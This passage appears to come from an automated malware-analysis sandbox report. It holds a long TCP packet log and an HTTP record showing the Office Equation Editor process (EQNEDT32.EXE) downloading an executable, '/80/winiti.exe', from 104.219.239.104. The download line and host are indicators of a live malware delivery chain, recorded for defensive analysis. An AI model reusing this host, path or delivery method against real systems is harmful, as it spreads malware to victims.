                            Jul 26, 2024 13:43:08.045388937 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.045536041 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.045587063 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.045607090 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.045617104 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.045625925 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.045635939 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.045644999 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.045648098 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.045660019 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.045677900 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.045840979 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.045885086 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.046009064 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.046019077 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.046027899 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.046036959 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.046046019 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.046049118 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.046056032 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.046058893 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.046065092 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.046075106 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.046077967 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.046083927 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.046087027 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.046092987 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.046102047 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.046104908 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.046112061 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.046113968 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.046137094 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.046137094 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.046209097 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.046680927 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.046691895 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.046701908 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.046710968 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.046725035 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.046725988 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.046737909 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.046737909 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.046758890 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.124620914 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.124648094 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.124660969 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.124672890 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.124716997 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.124721050 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.124732018 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.124742031 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.124747038 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.124752998 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.124753952 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.124771118 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.124785900 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.125001907 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.125013113 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.125022888 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.125042915 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.125053883 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.125252962 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.125263929 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.125273943 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.125283957 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.125293016 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.125302076 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.125319004 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.125628948 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.125639915 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.125644922 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.125662088 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.125672102 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.125679970 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.125682116 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.125688076 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.125691891 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.125701904 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.125705004 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.125724077 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.125760078 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.125760078 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.126099110 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.126111031 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.126135111 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.126143932 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.126233101 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.126245022 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.126256943 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.126266956 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.126270056 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.126280069 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.126281023 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.126293898 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.126302958 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.126307964 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.126317978 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.126318932 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.126328945 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.126339912 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.126339912 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.126354933 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.126372099 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.127116919 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.127129078 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.127147913 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.127159119 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.127161980 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.127170086 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.127180099 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.127181053 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.127192020 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.127192974 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.127202988 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.127209902 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.127213955 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.127226114 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.127226114 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.127237082 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.127238035 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.127248049 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.127255917 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.127270937 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.127279997 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.127988100 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.127999067 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.128009081 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.128026009 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.128036976 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.128122091 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.128134012 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.128143072 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.128154039 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.128154993 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.128165960 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.128169060 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.128175974 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.128186941 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.128189087 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.128197908 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.128206015 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.128209114 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.128220081 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.128220081 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.128228903 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.128247976 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.128839970 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.128886938 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.129378080 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.131143093 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.131154060 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.131195068 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.131200075 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.131231070 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.131257057 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.131268024 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.131294012 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.131304026 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.131378889 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.131412983 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.131417990 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.131424904 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.131449938 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.131462097 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.132992029 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.133044004 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.133044958 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.133054972 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.133078098 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.133091927 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.133193016 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.133203983 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.133250952 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.133254051 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.133294106 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.133337021 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.133347988 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.133380890 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.133488894 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.133501053 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.133512020 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.133522987 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.133534908 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.133546114 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.133564949 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.133693933 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.133704901 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.133738995 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.133749008 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.133888960 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.133899927 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.133909941 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.133920908 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.133930922 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.133938074 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.133940935 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.133951902 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.133953094 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.133964062 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.133970976 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.133975029 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.133985043 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.134004116 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.134341955 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.134354115 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.134396076 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.134448051 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.134459972 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.134469986 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.134480953 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.134490967 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.134500980 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.134500980 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.134500980 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.134511948 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.134515047 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.134524107 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.134533882 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.134535074 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.134546041 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.134547949 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.134565115 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.134578943 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.135065079 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.135077000 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.135087013 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.135114908 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.135124922 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.135219097 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.135230064 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.135241032 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.135250092 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.135262012 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.135272980 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.212846994 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.212865114 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.212877035 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.212922096 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.212933064 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.212944031 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.213001013 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.213150978 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.213195086 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.213779926 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.213823080 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.213830948 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.213840961 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.213869095 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.214049101 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.214059114 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.214067936 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.214078903 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.214092016 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.214101076 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.214117050 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.214406967 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.214417934 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.214426994 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.214437962 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.214447021 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.214456081 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.214464903 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.214464903 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.214466095 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.214472055 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.214477062 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.214490891 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.214503050 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.214669943 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.214710951 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.215114117 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.215125084 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.215135098 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.215145111 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.215153933 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.215157032 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.215164900 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.215173960 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.215176105 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.215184927 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.215187073 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.215198040 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.215202093 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.215207100 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.215209007 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.215219021 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.215228081 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.215229988 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.215246916 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.215260029 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.215346098 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.216027975 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.216039896 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.216048956 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.216059923 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.216068983 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.216072083 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.216078997 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.216084957 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.216089964 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.216090918 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.216100931 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.216110945 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.216111898 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.216124058 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.216124058 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.216130972 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.216135979 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.216145992 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.216147900 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.216154099 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.216171026 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.216273069 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.216923952 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.216933966 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.216943026 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.216952085 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.216960907 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.216968060 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.216968060 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.216970921 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.216980934 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.216989994 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.216990948 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.217000961 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.217001915 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.217010975 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.217015028 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.217020035 CEST8049163104.219.239.104192.168.2.22
                            Jul 26, 2024 13:43:08.217024088 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.217036963 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.217047930 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.217123032 CEST4916380192.168.2.22104.219.239.104
                            Jul 26, 2024 13:43:08.752541065 CEST4916380192.168.2.22104.219.239.104

                            HTTP Request Dependency Graph

                            • 104.219.239.104

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.2249163104.219.239.104802344C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                            TimestampBytes transferredDirectionData
                            Jul 26, 2024 13:43:06.745285034 CEST315OUTGET /80/winiti.exe HTTP/1.1
                            Accept: */*
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                            Host: 104.219.239.104
                            Connection: Keep-Alive
                            Jul 26, 2024 13:43:07.323700905 CEST1236INHTTP/1.1 200 OK
                            Date: Fri, 26 Jul 2024 11:43:07 GMT
                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                            Last-Modified: Tue, 16 Jul 2024 19:13:36 GMT
                            ETag: "e8400-61d6224798859"
                            Accept-Ranges: bytes
                            Content-Length: 951296
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: application/x-msdownload
